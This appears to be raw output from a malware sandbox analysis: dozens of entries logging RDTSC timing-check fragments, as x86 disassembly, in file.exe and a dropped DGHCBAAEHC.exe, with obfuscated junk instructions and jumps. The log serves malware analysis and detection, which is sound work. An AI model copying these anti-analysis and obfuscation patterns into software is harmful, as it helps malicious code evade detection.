                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD06AF second address: 4DD073F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F400072A732h 0x00000009 or eax, 06E9F628h 0x0000000f jmp 00007F400072A72Bh 0x00000014 popfd 0x00000015 mov si, 9F1Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c and dword ptr [ebp-04h], 00000000h 0x00000020 pushad 0x00000021 mov bx, ax 0x00000024 mov cx, 09B3h 0x00000028 popad 0x00000029 mov edx, dword ptr [ebp+0Ch] 0x0000002c jmp 00007F400072A736h 0x00000031 mov esi, edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F400072A72Dh 0x0000003c add ax, 1FA6h 0x00000041 jmp 00007F400072A731h 0x00000046 popfd 0x00000047 jmp 00007F400072A730h 0x0000004c popad 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD073F second address: 4DD0759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0C7EC5F4h 0x00000008 mov edx, 0ABC4D60h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov al, byte ptr [edx] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edx, esi 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0759 second address: 4DD075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD075F second address: 4DD079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc edx 0x00000009 pushad 0x0000000a mov ecx, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F4000E20B79h 0x00000014 xor eax, 26178BC6h 0x0000001a jmp 00007F4000E20B71h 0x0000001f popfd 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD079F second address: 4DD07C5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F400072A730h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F400072A72Ch 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD07C5 second address: 4DD07CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD07CB second address: 4DD07CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD07CF second address: 4DD0759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F4000E20AD8h 0x0000000e mov al, byte ptr [edx] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edx, esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD07FE second address: 4DD0802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0802 second address: 4DD0808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0808 second address: 4DD081A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400072A72Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD093F second address: 4DD0945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0945 second address: 4DD0969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A72Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b shr ecx, 02h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F400072A72Ch 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0969 second address: 4DD097F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4000E20B6Eh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD097F second address: 4DD09E8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 rep movsd 0x00000009 rep movsd 0x0000000b rep movsd 0x0000000d rep movsd 0x0000000f rep movsd 0x00000011 pushad 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F400072A738h 0x00000019 and ecx, 094F2418h 0x0000001f jmp 00007F400072A72Bh 0x00000024 popfd 0x00000025 mov eax, 0D23FFCFh 0x0000002a popad 0x0000002b mov al, C9h 0x0000002d popad 0x0000002e mov ecx, edx 0x00000030 pushad 0x00000031 call 00007F400072A72Dh 0x00000036 mov bx, si 0x00000039 pop ecx 0x0000003a push edx 0x0000003b mov dl, al 0x0000003d pop edi 0x0000003e popad 0x0000003f and ecx, 03h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F400072A72Ah 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD09E8 second address: 4DD09EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD09EC second address: 4DD09F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD09F2 second address: 4DD0A5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 11C0B733h 0x00000008 pushfd 0x00000009 jmp 00007F4000E20B78h 0x0000000e adc al, 00000038h 0x00000011 jmp 00007F4000E20B6Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a rep movsb 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F4000E20B6Bh 0x00000025 sub ecx, 7BD0C8FEh 0x0000002b jmp 00007F4000E20B79h 0x00000030 popfd 0x00000031 mov si, 7147h 0x00000035 popad 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0A5B second address: 4DD0A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400072A738h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0CF5 second address: 4DD0D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4000E20B76h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4000E20B6Ch 0x00000019 add ecx, 620EDD18h 0x0000001f jmp 00007F4000E20B6Bh 0x00000024 popfd 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 411CED second address: 411CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F400072A726h 0x0000000c rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 411CF9 second address: 411D44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4000E20B6Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4000E20B6Bh 0x00000014 jnl 00007F4000E20B8Ah 0x0000001a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 421AF7 second address: 421B0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F400072A72Fh 0x0000000d rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 424610 second address: 42462A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4000E20B66h 0x0000000a popad 0x0000000b pop ebx 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jng 00007F4000E20B74h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 42462A second address: 42462E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 424666 second address: 42466C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 42466C second address: 4246B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F400072A733h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d jmp 00007F400072A732h 0x00000012 pop ecx 0x00000013 nop 0x00000014 pushad 0x00000015 pushad 0x00000016 mov si, 2F5Eh 0x0000001a popad 0x0000001b sub esi, dword ptr [ebp+122D3168h] 0x00000021 popad 0x00000022 push 00000000h 0x00000024 adc dx, 9942h 0x00000029 push ACAF2391h 0x0000002e push edx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4246B9 second address: 4246BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 42479A second address: 4247A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4248AE second address: 4248B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4249AE second address: 4249B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F400072A726h 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4249B8 second address: 4249C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4249C7 second address: 4249D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F400072A726h 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4249D1 second address: 4249D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4249D5 second address: 424A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movzx esi, cx 0x0000000c push 00000000h 0x0000000e jns 00007F400072A73Ch 0x00000014 push 6BCA67D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F400072A734h 0x00000020 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 424A1A second address: 424AD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 6BCA6756h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F4000E20B68h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a cmc 0x0000002b push 00000003h 0x0000002d jng 00007F4000E20B6Ch 0x00000033 add dword ptr [ebp+122D2D9Eh], esi 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007F4000E20B68h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 push edi 0x00000056 jmp 00007F4000E20B72h 0x0000005b pop edi 0x0000005c push 00000003h 0x0000005e mov dx, 0DDEh 0x00000062 call 00007F4000E20B69h 0x00000067 jl 00007F4000E20B74h 0x0000006d jmp 00007F4000E20B6Eh 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jnc 00007F4000E20B6Ch 0x0000007b rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 424AD0 second address: 424B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d pushad 0x0000000e jmp 00007F400072A734h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edi 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 jmp 00007F400072A738h 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push edi 0x0000002b jp 00007F400072A72Ch 0x00000031 pop edi 0x00000032 pop eax 0x00000033 mov cx, 44E3h 0x00000037 lea ebx, dword ptr [ebp+12449536h] 0x0000003d movsx edi, si 0x00000040 and edx, dword ptr [ebp+122D2FC0h] 0x00000046 xchg eax, ebx 0x00000047 jmp 00007F400072A72Fh 0x0000004c push eax 0x0000004d pushad 0x0000004e jmp 00007F400072A739h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 424B6D second address: 424B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 424B71 second address: 424B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 41BCBB second address: 41BCDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F4000E20B72h 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44291D second address: 44293B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007F400072A732h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44293B second address: 442945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4000E20B66h 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 442945 second address: 442951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F400072A726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 442D52 second address: 442D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4000E20B66h 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 442E85 second address: 442E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 442E89 second address: 442E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44341A second address: 443432 instructions: 0x00000000 rdtsc 0x00000002 js 00007F400072A726h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F400072A726h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 443432 second address: 443436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 443436 second address: 443450 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F400072A726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F400072A732h 0x00000012 jno 00007F400072A726h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 41865F second address: 41866B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4000E20B66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 41866B second address: 41867F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F400072A726h 0x0000000a popad 0x0000000b push edi 0x0000000c je 00007F400072A726h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4441FF second address: 44420B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44420B second address: 444211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 444211 second address: 444215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44435C second address: 444360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 444360 second address: 444364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44453D second address: 444547 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F400072A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 444547 second address: 44454E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4447FD second address: 44480E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A72Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44480E second address: 444814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4478EE second address: 4478F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4478F5 second address: 44790E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F4000E20B66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f je 00007F4000E20B70h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 449008 second address: 44900E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44900E second address: 449017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 449017 second address: 449023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 449023 second address: 449032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 449032 second address: 449036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 449036 second address: 44903A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44903A second address: 44905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F400072A731h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44905D second address: 449062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44C1B7 second address: 44C1BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 40CBC5 second address: 40CBC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 40CBC9 second address: 40CBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 40CBCF second address: 40CBE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b jo 00007F4000E20B66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 44D5D3 second address: 44D5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4530C7 second address: 4530CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4530CB second address: 4530D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4530D3 second address: 4530DD instructions: 0x00000000 rdtsc 0x00000002 js 00007F4000E20B6Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeRDTSC instruction interceptor: First address: 4530DD second address: 4530F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F400072A72Bh 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
